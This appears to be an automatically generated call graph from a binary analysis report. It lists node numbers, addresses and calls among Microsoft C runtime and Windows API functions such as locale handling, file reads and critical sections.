19330->19331 19332 31aaa5 19331->19332 19333 31aaa9 19332->19333 19334 31ac78 std::_Lockit::_Lockit 5 API calls 19333->19334 19335 31aabf 19334->19335 19336 31aac3 19335->19336 19337 31ac78 std::_Lockit::_Lockit 5 API calls 19336->19337 19338 31aad9 19337->19338 19339 31aadd 19338->19339 19340 31ac78 std::_Lockit::_Lockit 5 API calls 19339->19340 19341 31aaf3 19340->19341 19342 31aaf7 19341->19342 19343 31ac78 std::_Lockit::_Lockit 5 API calls 19342->19343 19344 31ab0d 19343->19344 19345 31ab11 19344->19345 19346 31ac78 std::_Lockit::_Lockit 5 API calls 19345->19346 19347 31ab27 19346->19347 19348 31ab2b 19347->19348 19349 31ac78 std::_Lockit::_Lockit 5 API calls 19348->19349 19350 31ab41 19349->19350 19351 31ab45 19350->19351 19352 31ac78 std::_Lockit::_Lockit 5 API calls 19351->19352 19353 31ab5b 19352->19353 19354 31ab79 19353->19354 19355 31ac78 std::_Lockit::_Lockit 5 API calls 19354->19355 19356 31ab8f 19355->19356 19357 31ab5f 19356->19357 19358 31ac78 std::_Lockit::_Lockit 5 API calls 19357->19358 19359 31ab75 19358->19359 19359->19329 19360->19256 19361->19257 19404 3153b2 19362->19404 19366 30c588 19367 3153b2 std::_Locinfo::_Locinfo_dtor 66 API calls 19366->19367 19369 30c597 19366->19369 19367->19369 19547 30ad66 19387->19547 19390 30e360 Concurrency::cancel_current_task RaiseException 19391 302156 19390->19391 19392 30c86a 19391->19392 19393 30c87d 19392->19393 19398 30c88a 19392->19398 19394 315599 __Getctype 39 API calls 19393->19394 19395 30c882 19394->19395 19397 315574 __Getctype 39 API calls 19395->19397 19396 30c8bd 19400 315432 __Getctype 39 API calls 19396->19400 19401 302171 19396->19401 19402 30c8dc 19396->19402 19397->19398 19398->19396 19398->19401 19550 3154f0 19398->19550 19400->19402 19401->19231 19559 30cbaa 19402->19559 19405 31b0a9 std::_Lockit::_Lockit 5 API calls 19404->19405 19406 3153bf 19405->19406 19415 31515d 19406->19415 19409 30c3bc 19410 30c3ca 19409->19410 19414 30c3f5 _Yarn 19409->19414 19411 313921 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 19410->19411 19412 30c3d6 19410->19412 19411->19412 19412->19412 19413 315152 ___std_exception_copy 15 API calls 19412->19413 19412->19414 19413->19414 19414->19366 19416 315169 ___scrt_is_nonwritable_in_current_image 19415->19416 19423 313a77 EnterCriticalSection 19416->19423 19418 315177 19424 3151b8 19418->19424 19423->19418 19449 315317 19424->19449 19426 3151d3 19427 3193b0 __Getctype 39 API calls 19426->19427 19445 315184 19426->19445 19428 3151e0 19427->19428 19473 31e6c5 19428->19473 19446 3151ac 19445->19446 19509 313abf LeaveCriticalSection 19446->19509 19448 30c570 19448->19409 19450 315331 19449->19450 19451 315323 19449->19451 19494 31e30c 19450->19494 19479 317b3f 19451->19479 19455 31532d 19455->19426 19456 3153a7 19458 31180c __Getctype 11 API calls 19456->19458 19457 3196e7 __Getctype 14 API calls 19459 315363 19457->19459 19460 3153b1 19458->19460 19461 31538b 19459->19461 19463 31e30c std::_Locinfo::_Locinfo_dtor 41 API calls 19459->19463 19465 31b0a9 std::_Lockit::_Lockit 5 API calls 19460->19465 19462 319744 ___free_lconv_mon 14 API calls 19461->19462 19464 3153a0 19462->19464 19466 31537a 19463->19466 19464->19426 19467 3153bf 19465->19467 19468 315381 19466->19468 19469 31538d 19466->19469 19470 31515d std::_Locinfo::_Locinfo_dtor 66 API calls 19467->19470 19468->19456 19468->19461 19471 317b3f std::_Locinfo::_Locinfo_dtor 63 API calls 19469->19471 19472 3153e8 19470->19472 19471->19461 19472->19426 19474 31e6d9 _Fputc 19473->19474 19500 31e349 19474->19500 19480 317b55 19479->19480 19481 317b69 19479->19481 19483 315b3e __dosmaperr 14 API calls 19480->19483 19482 3193b0 __Getctype 39 API calls 19481->19482 19484 317b6e 19482->19484 19485 317b5a 19483->19485 19486 31b0a9 std::_Lockit::_Lockit 5 API calls 19484->19486 19487 3117df __fread_nolock 39 API calls 19485->19487 19488 317b76 19486->19488 19489 317b65 19487->19489 19490 321766 __Getctype 39 API calls 19488->19490 19489->19455 19491 317b7b 19490->19491 19492 31715a std::_Locinfo::_Locinfo_dtor 63 API calls 19491->19492 19493 317bbd 19492->19493 19493->19455 19495 31e31f _Fputc 19494->19495 19496 31e069 std::_Locinfo::_Locinfo_dtor 41 API calls 19495->19496 19497 31e337 19496->19497 19498 31151b _Fputc 39 API calls 19497->19498 19499 315348 19498->19499 19499->19456 19499->19457 19501 31e360 19500->19501 19502 31e38a 19501->19502 19503 31e364 19501->19503 19504 311762 _Fputc 39 API calls 19502->19504 19505 31e41e std::_Locinfo::_Locinfo_dtor 41 API calls 19503->19505 19508 31e382 19503->19508 19505->19508 19509->19448 19548 3017b0 std::invalid_argument::invalid_argument 40 API calls 19547->19548 19549 30ad78 19548->19549 19549->19390 19551 315521 19550->19551 19556 315507 19550->19556 19552 3193b0 __Getctype 39 API calls 19551->19552 19553 315526 19552->19553 19554 3197cc __Getctype 39 API calls 19553->19554 19555 315536 19554->19555 19555->19556 19583 31e703 19555->19583 19556->19396 19560 30cbd8 MultiByteToWideChar 19559->19560 19564 30cbc4 19559->19564 19561 30cd60 19560->19561 19562 30cc04 19560->19562 19563 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19561->19563 19566 315152 ___std_exception_copy 15 API calls 19562->19566 19568 30cc1d __alloca_probe_16 19562->19568 19578 30cd50 19562->19578 19565 30cd72 19563->19565 19564->19560 19565->19401 19566->19568 19567 30cb91 14 API calls 19567->19561 19569 30cc51 MultiByteToWideChar 19568->19569 19568->19578 19570 30cc6a LCMapStringEx 19569->19570 19569->19578 19571 30cc89 19570->19571 19570->19578 19572 30ccc3 19571->19572 19573 30cc93 19571->19573 19574 30cd44 19572->19574 19577 315152 ___std_exception_copy 15 API calls 19572->19577 19579 30ccd5 __alloca_probe_16 19572->19579 19575 30cca6 LCMapStringEx 19573->19575 19573->19578 19601 30cb91 19574->19601 19575->19578 19577->19579 19578->19567 19579->19574 19580 30cd05 LCMapStringEx 19579->19580 19580->19574 19581 30cd21 WideCharToMultiByte 19580->19581 19581->19574 19590 315b95 19583->19590 19591 315bb3 19590->19591 19592 3193b0 __Getctype 39 API calls 19591->19592 19593 315bd4 19592->19593 19594 3197cc __Getctype 39 API calls 19593->19594 19595 315bea 19594->19595 19597 31982a 19595->19597 19598 319852 19597->19598 19599 31983d 19597->19599 19599->19598 19600 32005a std::_Locinfo::_Locinfo_dtor 39 API calls 19599->19600 19600->19598 19602 30cb97 19601->19602 19603 30cba8 19601->19603 19602->19603 19604 313921 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 19602->19604 19603->19578 19604->19603 19606 30adc0 Concurrency::cancel_current_task 19605->19606 19607 30e360 Concurrency::cancel_current_task RaiseException 19606->19607 19608 30adce 19607->19608 19610 30b56a std::_Lockit::_Lockit 7 API calls 19609->19610 19611 308b28 19610->19611 19612 30b56a std::_Lockit::_Lockit 7 API calls 19611->19612 19616 308b6b 19611->19616 19613 308b4b 19612->19613 19618 30b5c2 std::_Lockit::~_Lockit 2 API calls 19613->19618 19614 308bb8 19615 30b5c2 std::_Lockit::~_Lockit 2 API calls 19614->19615 19617 308bf8 19615->19617 19616->19614 19626 309920 19616->19626 19617->18825 19618->19616 19621 308bd0 19624 30c432 16 API calls 19621->19624 19622 308c0b 19623 301c90 Concurrency::cancel_current_task 41 API calls 19622->19623 19625 308c10 19623->19625 19624->19614 19627 309947 19626->19627 19628 308bc8 19626->19628 19627->19628 19629 30cd92 codecvt 41 API calls 19627->19629 19628->19621 19628->19622 19630 309959 19629->19630 19631 30b56a std::_Lockit::_Lockit 7 API calls 19630->19631 19632 30998d 19631->19632 19633 309aa3 19632->19633 19634 3099cf 19632->19634 22095 319277 22096 319282 22095->22096 22097 319292 22095->22097 22101 319298 22096->22101 22100 319744 ___free_lconv_mon 14 API calls 22100->22097 22102 3192b3 22101->22102 22103 3192ad 22101->22103 22105 319744 ___free_lconv_mon 14 API calls 22102->22105 22104 319744 ___free_lconv_mon 14 API calls 22103->22104 22104->22102 22106 3192bf 22105->22106 22107 319744 ___free_lconv_mon 14 API calls 22106->22107 22108 3192ca 22107->22108 22109 319744 ___free_lconv_mon 14 API calls 22108->22109 22110 3192d5 22109->22110 22111 319744 ___free_lconv_mon 14 API calls 22110->22111 22112 3192e0 22111->22112 22113 319744 ___free_lconv_mon 14 API calls 22112->22113 22114 3192eb 22113->22114 22115 319744 ___free_lconv_mon 14 API calls 22114->22115 22116 3192f6 22115->22116 22117 319744 ___free_lconv_mon 14 API calls 22116->22117 22118 319301 22117->22118 22119 319744 ___free_lconv_mon 14 API calls 22118->22119 22120 31930c 22119->22120 22121 319744 ___free_lconv_mon 14 API calls 22120->22121 22122 31931a 22121->22122 22127 3190c4 22122->22127 22128 3190d0 ___scrt_is_nonwritable_in_current_image 22127->22128 22143 313a77 EnterCriticalSection 22128->22143 22131 3190da 22133 319744 ___free_lconv_mon 14 API calls 22131->22133 22134 319104 22131->22134 22133->22134 22144 319123 22134->22144 22135 31912f 22136 31913b ___scrt_is_nonwritable_in_current_image 22135->22136 22148 313a77 EnterCriticalSection 22136->22148 22138 319145 22139 319365 __Getctype 14 API calls 22138->22139 22140 319158 22139->22140 22149 319178 22140->22149 22143->22131 22147 313abf LeaveCriticalSection 22144->22147 22146 319111 22146->22135 22147->22146 22148->22138 22152 313abf LeaveCriticalSection 22149->22152 22151 319166 22151->22100 22152->22151 21397 30bd69 21398 30bd7d 21397->21398 21404 30bdd8 21398->21404 21405 30b843 21398->21405 21401 30bdc5 21401->21404 21417 31428c 21401->21417 21408 30b85d 21405->21408 21410 30b8ac 21405->21410 21406 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21407 30b8c3 21406->21407 21407->21401 21407->21404 21411 314ab4 21407->21411 21409 314db3 67 API calls 21408->21409 21408->21410 21409->21410 21410->21406 21412 314ac7 _Fputc 21411->21412 21431 314845 21412->21431 21415 31151b _Fputc 39 API calls 21416 314ae9 21415->21416 21416->21401 21418 314297 21417->21418 21419 3142ac 21417->21419 21422 315b3e __dosmaperr 14 API calls 21418->21422 21420 3142b4 21419->21420 21421 3142c9 21419->21421 21423 315b3e __dosmaperr 14 API calls 21420->21423 21460 31d190 21421->21460 21425 31429c 21422->21425 21426 3142b9 21423->21426 21428 3117df __fread_nolock 39 API calls 21425->21428 21430 3117df __fread_nolock 39 API calls 21426->21430 21427 3142c4 21427->21404 21429 3142a7 21428->21429 21429->21404 21430->21427 21433 314851 ___scrt_is_nonwritable_in_current_image 21431->21433 21432 314857 21434 311762 _Fputc 39 API calls 21432->21434 21433->21432 21436 31489a 21433->21436 21435 314872 21434->21435 21435->21415 21442 313c57 EnterCriticalSection 21436->21442 21438 3148a6 21443 3149c8 21438->21443 21440 3148bc 21452 3148e5 21440->21452 21442->21438 21444 3149db 21443->21444 21445 3149ee 21443->21445 21444->21440 21455 3148ef 21445->21455 21447 314a9f 21447->21440 21448 314a11 21448->21447 21449 31400d ___scrt_uninitialize_crt 64 API calls 21448->21449 21450 314a3f 21449->21450 21451 31dfef ___scrt_uninitialize_crt 41 API calls 21450->21451 21451->21447 21459 313c6b LeaveCriticalSection 21452->21459 21454 3148ed 21454->21435 21456 314900 21455->21456 21457 314958 21455->21457 21456->21457 21458 31dfaf __fread_nolock 41 API calls 21456->21458 21457->21448 21458->21457 21459->21454 21461 31d1a4 _Fputc 21460->21461 21466 31cb99 21461->21466 21464 31151b _Fputc 39 API calls 21465 31d1be 21464->21465 21465->21427 21467 31cba5 ___scrt_is_nonwritable_in_current_image 21466->21467 21468 31cbac 21467->21468 21469 31cbcf 21467->21469 21470 311762 _Fputc 39 API calls 21468->21470 21477 313c57 EnterCriticalSection 21469->21477 21476 31cbc5 21470->21476 21472 31cbdd 21478 31cc28 21472->21478 21474 31cbec 21491 31cc1e 21474->21491 21476->21464 21477->21472 21479 31cc37 21478->21479 21480 31cc5f 21478->21480 21481 311762 _Fputc 39 API calls 21479->21481 21482 31a67e __fread_nolock 39 API calls 21480->21482 21490 31cc52 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21481->21490 21483 31cc68 21482->21483 21494 31df91 21483->21494 21486 31cd12 21497 31cf94 21486->21497 21488 31cd29 21488->21490 21509 31cdc9 21488->21509 21490->21474 21516 313c6b LeaveCriticalSection 21491->21516 21493 31cc26 21493->21476 21495 31dda9 43 API calls 21494->21495 21496 31cc86 21495->21496 21496->21486 21496->21488 21496->21490 21498 31cfa3 ___scrt_uninitialize_crt 21497->21498 21499 31a67e __fread_nolock 39 API calls 21498->21499 21501 31cfbf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21499->21501 21500 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21502 31d13d 21500->21502 21503 31df91 43 API calls 21501->21503 21508 31cfcb 21501->21508 21502->21490 21504 31d01f 21503->21504 21505 31d051 ReadFile 21504->21505 21504->21508 21506 31d078 21505->21506 21505->21508 21507 31df91 43 API calls 21506->21507 21507->21508 21508->21500 21510 31a67e __fread_nolock 39 API calls 21509->21510 21511 31cddc 21510->21511 21512 31df91 43 API calls 21511->21512 21515 31ce26 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21511->21515 21513 31ce83 21512->21513 21514 31df91 43 API calls 21513->21514 21513->21515 21514->21515 21515->21490 21516->21493 22314 30ba5c 22315 30ba63 22314->22315 22316 30baaf 22314->22316 22319 313c57 EnterCriticalSection 22315->22319 22318 30ba68 22319->22318 22687 30bf44 22688 30bf50 __EH_prolog3_GS 22687->22688 22691 30bfa0 22688->22691 22692 30bfb9 22688->22692 22695 30bf6a 22688->22695 22703 30b5e1 22691->22703 22706 314173 22692->22706 22736 30d5e2 22695->22736 22698 30c07d 22731 301460 22698->22731 22699 30bfd8 22699->22698 22701 314173 41 API calls 22699->22701 22702 30c0ad 22699->22702 22726 3014b0 22699->22726 22700 3150df 41 API calls 22700->22702 22701->22699 22702->22698 22702->22700 22704 314173 41 API calls 22703->22704 22705 30b5ec 22704->22705 22705->22695 22707 31417f ___scrt_is_nonwritable_in_current_image 22706->22707 22708 3141a1 22707->22708 22709 314189 22707->22709 22739 313c57 EnterCriticalSection 22708->22739 22710 315b3e __dosmaperr 14 API calls 22709->22710 22713 31418e 22710->22713 22712 3141ac 22715 31a67e __fread_nolock 39 API calls 22712->22715 22716 3141c4 22712->22716 22714 3117df __fread_nolock 39 API calls 22713->22714 22725 314199 _Fputc 22714->22725 22715->22716 22717 314254 22716->22717 22718 31422c 22716->22718 22740 314137 22717->22740 22720 315b3e __dosmaperr 14 API calls 22718->22720 22721 314231 22720->22721 22723 3117df __fread_nolock 39 API calls 22721->22723 22722 31425a 22747 314284 22722->22747 22723->22725 22725->22699 22727 3014db 22726->22727 22728 3014bc 22726->22728 22729 3015e0 41 API calls 22727->22729 22728->22699 22730 3014ec 22729->22730 22730->22699 22732 30146b 22731->22732 22733 301486 error_info_injector 22731->22733 22732->22733 22734 3117ef 39 API calls 22732->22734 22733->22695 22735 3014aa 22734->22735 22737 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22736->22737 22738 30d5ec 22737->22738 22738->22738 22739->22712 22741 314143 22740->22741 22745 314158 __fread_nolock 22740->22745 22742 315b3e __dosmaperr 14 API calls 22741->22742 22743 314148 22742->22743 22744 3117df __fread_nolock 39 API calls 22743->22744 22746 314153 22744->22746 22745->22722 22746->22722 22750 313c6b LeaveCriticalSection 22747->22750 22749 31428a 22749->22725 22750->22749 21524 31a947 21525 31a953 ___scrt_is_nonwritable_in_current_image 21524->21525 21536 313a77 EnterCriticalSection 21525->21536 21527 31a95a 21537 320629 21527->21537 21535 31a978 21561 31a99e 21535->21561 21536->21527 21538 320635 ___scrt_is_nonwritable_in_current_image 21537->21538 21539 32063e 21538->21539 21540 32065f 21538->21540 21541 315b3e __dosmaperr 14 API calls 21539->21541 21564 313a77 EnterCriticalSection 21540->21564 21543 320643 21541->21543 21544 3117df __fread_nolock 39 API calls 21543->21544 21545 31a969 21544->21545 21545->21535 21550 31a7e1 GetStartupInfoW 21545->21550 21546 320697 21572 3206be 21546->21572 21548 32066b 21548->21546 21565 320579 21548->21565 21551 31a892 21550->21551 21552 31a7fe 21550->21552 21556 31a897 21551->21556 21552->21551 21553 320629 40 API calls 21552->21553 21555 31a826 21553->21555 21554 31a856 GetFileType 21554->21555 21555->21551 21555->21554 21557 31a89e 21556->21557 21558 31a8e1 GetStdHandle 21557->21558 21559 31a943 21557->21559 21560 31a8f4 GetFileType 21557->21560 21558->21557 21559->21535 21560->21557 21581 313abf LeaveCriticalSection 21561->21581 21563 31a989 21564->21548 21566 3196e7 __Getctype 14 API calls 21565->21566 21567 32058b 21566->21567 21571 320598 21567->21571 21575 31af0b 21567->21575 21568 319744 ___free_lconv_mon 14 API calls 21569 3205ed 21568->21569 21569->21548 21571->21568 21580 313abf LeaveCriticalSection 21572->21580 21574 3206c5 21574->21545 21576 31ac78 std::_Lockit::_Lockit 5 API calls 21575->21576 21577 31af27 21576->21577 21578 31af45 InitializeCriticalSectionAndSpinCount 21577->21578 21579 31af30 21577->21579 21578->21579 21579->21567 21580->21574 21581->21563 22790 30b7b5 22793 30b758 22790->22793 22792 30b7c0 error_info_injector 22794 30b789 22793->22794 22795 30b79b 22794->22795 22797 30bb19 22794->22797 22795->22792 22798 30bb23 22797->22798 22800 30bb3f 22797->22800 22799 30b843 67 API calls 22798->22799 22801 30bb30 22799->22801 22800->22795 22803 313da4 22801->22803 22804 313db7 _Fputc 22803->22804 22809 313c7f 22804->22809 22806 313dc3 22807 31151b _Fputc 39 API calls 22806->22807 22808 313dcf 22807->22808 22808->22800 22810 313c8b ___scrt_is_nonwritable_in_current_image 22809->22810 22811 313c95 22810->22811 22812 313cb8 22810->22812 22813 311762 _Fputc 39 API calls 22811->22813 22819 313cb0 22812->22819 22820 313c57 EnterCriticalSection 22812->22820 22813->22819 22815 313cd6 22821 313d16 22815->22821 22817 313ce3 22835 313d0e 22817->22835 22819->22806 22820->22815 22822 313d23 22821->22822 22823 313d46 22821->22823 22824 311762 _Fputc 39 API calls 22822->22824 22825 31400d ___scrt_uninitialize_crt 64 API calls 22823->22825 22826 313d3e 22823->22826 22824->22826 22827 313d5e 22825->22827 22826->22817 22828 31bbc2 14 API calls 22827->22828 22829 313d66 22828->22829 22830 31a67e __fread_nolock 39 API calls 22829->22830 22831 313d72 22830->22831 22838 31bc93 22831->22838 22834 319744 ___free_lconv_mon 14 API calls 22834->22826 22880 313c6b LeaveCriticalSection 22835->22880 22837 313d14 22837->22819 22839 31bcbc 22838->22839 22844 313d79 22838->22844 22840 31bd0b 22839->22840 22842 31bce3 22839->22842 22841 311762 _Fputc 39 API calls 22840->22841 22841->22844 22845 31bc02 22842->22845 22844->22826 22844->22834 22846 31bc0e ___scrt_is_nonwritable_in_current_image 22845->22846 22853 3206c7 EnterCriticalSection 22846->22853 22848 31bc1c 22849 31bc4d 22848->22849 22854 31bd36 22848->22854 22867 31bc87 22849->22867 22853->22848 22855 32079e __fread_nolock 39 API calls 22854->22855 22858 31bd46 22855->22858 22856 31bd4c 22870 32070d 22856->22870 22858->22856 22859 31bd7e 22858->22859 22860 32079e __fread_nolock 39 API calls 22858->22860 22859->22856 22861 32079e __fread_nolock 39 API calls 22859->22861 22862 31bd75 22860->22862 22863 31bd8a CloseHandle 22861->22863 22864 32079e __fread_nolock 39 API calls 22862->22864 22863->22856 22865 31bd96 GetLastError 22863->22865 22864->22859 22865->22856 22866 31bda4 __fread_nolock 22866->22849 22879 3206ea LeaveCriticalSection 22867->22879 22869 31bc70 22869->22844 22871 320783 22870->22871 22872 32071c 22870->22872 22873 315b3e __dosmaperr 14 API calls 22871->22873 22872->22871 22878 320746 22872->22878 22874 320788 22873->22874 22875 315b2b __dosmaperr 14 API calls 22874->22875 22876 320773 22875->22876 22876->22866 22877 32076d SetStdHandle 22877->22876 22878->22876 22878->22877 22879->22869 22880->22837 22347 30beba 22349 30bec6 22347->22349 22348 30befd 22349->22348 22353 314fb1 22349->22353 22352 30b9b2 39 API calls 22352->22348 22354 314fc4 _Fputc 22353->22354 22359 314ee8 22354->22359 22356 314fd9 22357 31151b _Fputc 39 API calls 22356->22357 22358 30beea 22357->22358 22358->22348 22358->22352 22360 314efa 22359->22360 22363 314f1d 22359->22363 22361 311762 _Fputc 39 API calls 22360->22361 22362 314f15 22361->22362 22362->22356 22363->22360 22364 314f44 22363->22364 22367 314ded 22364->22367 22368 314df9 ___scrt_is_nonwritable_in_current_image 22367->22368 22375 313c57 EnterCriticalSection 22368->22375 22370 314e07 22376 314e48 22370->22376 22372 314e14 22385 314e3c 22372->22385 22375->22370 22377 31400d ___scrt_uninitialize_crt 64 API calls 22376->22377 22378 314e63 22377->22378 22388 31bbc2 22378->22388 22381 3196e7 __Getctype 14 API calls 22382 314eac 22381->22382 22383 319744 ___free_lconv_mon 14 API calls 22382->22383 22384 314e88 22383->22384 22384->22372 22392 313c6b LeaveCriticalSection 22385->22392 22387 314e25 22387->22356 22389 31bbd9 22388->22389 22390 314e6d 22388->22390 22389->22390 22391 319744 ___free_lconv_mon 14 API calls 22389->22391 22390->22381 22390->22384 22391->22390 22392->22387 20238 3258a0 20241 320012 20238->20241 20242 32004d 20241->20242 20243 32001b 20241->20243 20247 31946b 20243->20247 20248 319476 20247->20248 20249 31947c 20247->20249 20251 31ae0f __Getctype 6 API calls 20248->20251 20250 31ae4e __Getctype 6 API calls 20249->20250 20269 319482 20249->20269 20252 319496 20250->20252 20251->20249 20253 3196e7 __Getctype 14 API calls 20252->20253 20252->20269 20255 3194a6 20253->20255 20254 315b51 CallUnexpected 39 API calls 20256 319500 20254->20256 20257 3194c3 20255->20257 20258 3194ae 20255->20258 20260 31ae4e __Getctype 6 API calls 20257->20260 20259 31ae4e __Getctype 6 API calls 20258->20259 20267 3194ba 20259->20267 20261 3194cf 20260->20261 20262 3194d3 20261->20262 20263 3194e2 20261->20263 20266 31ae4e __Getctype 6 API calls 20262->20266 20264 3191de __Getctype 14 API calls 20263->20264 20268 3194ed 20264->20268 20265 319744 ___free_lconv_mon 14 API calls 20265->20269 20266->20267 20267->20265 20270 319744 ___free_lconv_mon 14 API calls 20268->20270 20269->20254 20271 319487 20269->20271 20270->20271 20272 31fe1d 20271->20272 20273 31ff72 std::_Locinfo::_Locinfo_dtor 39 API calls 20272->20273 20274 31fe47 20273->20274 20295 31fba4 20274->20295 20277 31977e std::_Locinfo::_Locinfo_dtor 15 API calls 20278 31fe71 20277->20278 20279 31fe87 20278->20279 20280 31fe79 20278->20280 20302 32006d 20279->20302 20282 319744 ___free_lconv_mon 14 API calls 20280->20282 20283 31fe60 20282->20283 20283->20242 20285 31febf 20286 315b3e __dosmaperr 14 API calls 20285->20286 20287 31fec4 20286->20287 20290 319744 ___free_lconv_mon 14 API calls 20287->20290 20288 31ff06 20289 31ff4f 20288->20289 20313 31fa96 20288->20313 20293 319744 ___free_lconv_mon 14 API calls 20289->20293 20290->20283 20291 31feda 20291->20288 20294 319744 ___free_lconv_mon 14 API calls 20291->20294 20293->20283 20294->20288 20296 315b95 std::_Locinfo::_Locinfo_dtor 39 API calls 20295->20296 20297 31fbb6 20296->20297 20298 31fbc5 GetOEMCP 20297->20298 20299 31fbd7 20297->20299 20300 31fbee 20298->20300 20299->20300 20301 31fbdc GetACP 20299->20301 20300->20277 20300->20283 20301->20300 20303 31fba4 41 API calls 20302->20303 20305 32008d 20303->20305 20304 320192 20307 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20304->20307 20305->20304 20306 3200ca IsValidCodePage 20305->20306 20309 3200e5 __fread_nolock 20305->20309 20306->20304 20308 3200dc 20306->20308 20310 31feb4 20307->20310 20308->20309 20311 320105 GetCPInfo 20308->20311 20321 31fc78 20309->20321 20310->20285 20310->20291 20311->20304 20311->20309 20314 31faa2 ___scrt_is_nonwritable_in_current_image 20313->20314 20401 313a77 EnterCriticalSection 20314->20401 20316 31faac 20402 31fae3 20316->20402 20322 31fca0 GetCPInfo 20321->20322 20331 31fd69 20321->20331 20327 31fcb8 20322->20327 20322->20331 20323 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20325 31fe1b 20323->20325 20325->20304 20332 31ea5d 20327->20332 20330 31ed4d 43 API calls 20330->20331 20331->20323 20333 315b95 std::_Locinfo::_Locinfo_dtor 39 API calls 20332->20333 20334 31ea7d 20333->20334 20352 31f2e9 20334->20352 20336 31eb39 20338 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20336->20338 20337 31eb31 20355 30cd74 20337->20355 20340 31eb5c 20338->20340 20339 31eaaa 20339->20336 20339->20337 20342 31977e std::_Locinfo::_Locinfo_dtor 15 API calls 20339->20342 20343 31eacf __fread_nolock __alloca_probe_16 20339->20343 20347 31ed4d 20340->20347 20342->20343 20343->20337 20344 31f2e9 __fread_nolock MultiByteToWideChar 20343->20344 20345 31eb18 20344->20345 20345->20337 20346 31eb1f GetStringTypeW 20345->20346 20346->20337 20348 315b95 std::_Locinfo::_Locinfo_dtor 39 API calls 20347->20348 20349 31ed60 20348->20349 20361 31eb5e 20349->20361 20359 31f251 20352->20359 20356 30cd7e 20355->20356 20358 30cd8f 20355->20358 20357 313921 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 20356->20357 20356->20358 20357->20358 20358->20336 20360 31f262 MultiByteToWideChar 20359->20360 20360->20339 20362 31eb79 20361->20362 20363 31f2e9 __fread_nolock MultiByteToWideChar 20362->20363 20366 31ebbd 20363->20366 20364 31ed38 20365 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20364->20365 20367 31ed4b 20365->20367 20366->20364 20368 31977e std::_Locinfo::_Locinfo_dtor 15 API calls 20366->20368 20370 31ebe3 __alloca_probe_16 20366->20370 20382 31ec8b 20366->20382 20367->20330 20368->20370 20369 30cd74 __freea 14 API calls 20369->20364 20371 31f2e9 __fread_nolock MultiByteToWideChar 20370->20371 20370->20382 20372 31ec2c 20371->20372 20372->20382 20389 31afd0 20372->20389 20375 31ec62 20381 31afd0 std::_Locinfo::_Locinfo_dtor 6 API calls 20375->20381 20375->20382 20376 31ec9a 20377 31ed23 20376->20377 20378 31ecac __alloca_probe_16 20376->20378 20379 31977e std::_Locinfo::_Locinfo_dtor 15 API calls 20376->20379 20380 30cd74 __freea 14 API calls 20377->20380 20378->20377 20383 31afd0 std::_Locinfo::_Locinfo_dtor 6 API calls 20378->20383 20379->20378 20380->20382 20381->20382 20382->20369 20384 31ecef 20383->20384 20384->20377 20385 31f3a3 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 20384->20385 20386 31ed09 20385->20386 20386->20377 20387 31ed12 20386->20387 20388 30cd74 __freea 14 API calls 20387->20388 20388->20382 20390 31ab79 std::_Lockit::_Lockit 5 API calls 20389->20390 20391 31afdb 20390->20391 20394 31afe1 20391->20394 20395 31b02d 20391->20395 20393 31b021 LCMapStringW 20393->20394 20394->20375 20394->20376 20394->20382 20398 31ab93 20395->20398 20397 31b038 std::_Locinfo::_Locinfo_dtor 20397->20393 20399 31ac78 std::_Lockit::_Lockit 5 API calls 20398->20399 20400 31aba9 20399->20400 20400->20397 20401->20316 20412 31470f 20402->20412 20404 31fb05 20405 31470f __fread_nolock 39 API calls 20404->20405 20406 31fb24 20405->20406 20407 31fab9 20406->20407 20408 319744 ___free_lconv_mon 14 API calls 20406->20408 20409 31fad7 20407->20409 20408->20407 20426 313abf LeaveCriticalSection 20409->20426 20411 31fac5 20411->20289 20413 314720 20412->20413 20417 31471c _Yarn 20412->20417 20414 314727 20413->20414 20419 31473a __fread_nolock 20413->20419 20415 315b3e __dosmaperr 14 API calls 20414->20415 20416 31472c 20415->20416 20418 3117df __fread_nolock 39 API calls 20416->20418 20417->20404 20418->20417 20419->20417 20420 314771 20419->20420 20421 314768 20419->20421 20420->20417 20423 315b3e __dosmaperr 14 API calls 20420->20423 20422 315b3e __dosmaperr 14 API calls 20421->20422 20424 31476d 20422->20424 20423->20424 20425 3117df __fread_nolock 39 API calls 20424->20425 20425->20417 20426->20411 21065 30bcea 21066 30bd01 21065->21066 21068 30bd14 21066->21068 21069 3150df 21066->21069 21070 3150eb ___scrt_is_nonwritable_in_current_image 21069->21070 21071 3150f2 21070->21071 21072 315107 21070->21072 21074 315b3e __dosmaperr 14 API calls 21071->21074 21082 313c57 EnterCriticalSection 21072->21082 21076 3150f7 21074->21076 21075 315111 21083 314feb 21075->21083 21078 3117df __fread_nolock 39 API calls 21076->21078 21080 315102 21078->21080 21080->21068 21082->21075 21084 315003 21083->21084 21086 315073 21083->21086 21085 31a67e __fread_nolock 39 API calls 21084->21085 21089 315009 21085->21089 21087 31e00d 14 API calls 21086->21087 21088 31506b 21086->21088 21087->21088 21094 31514a 21088->21094 21089->21086 21090 31505b 21089->21090 21091 315b3e __dosmaperr 14 API calls 21090->21091 21092 315060 21091->21092 21093 3117df __fread_nolock 39 API calls 21092->21093 21093->21088 21097 313c6b LeaveCriticalSection 21094->21097 21096 315150 21096->21080 21097->21096 18091 31d1d1 18103 31a67e 18091->18103 18093 31d1ea 18094 31d1de 18094->18093 18096 31d236 18094->18096 18122 31d399 18094->18122 18096->18093 18097 31d298 18096->18097 18110 31a6ba 18096->18110 18130 31d2c7 18097->18130 18101 31d28b 18101->18097 18117 31e00d 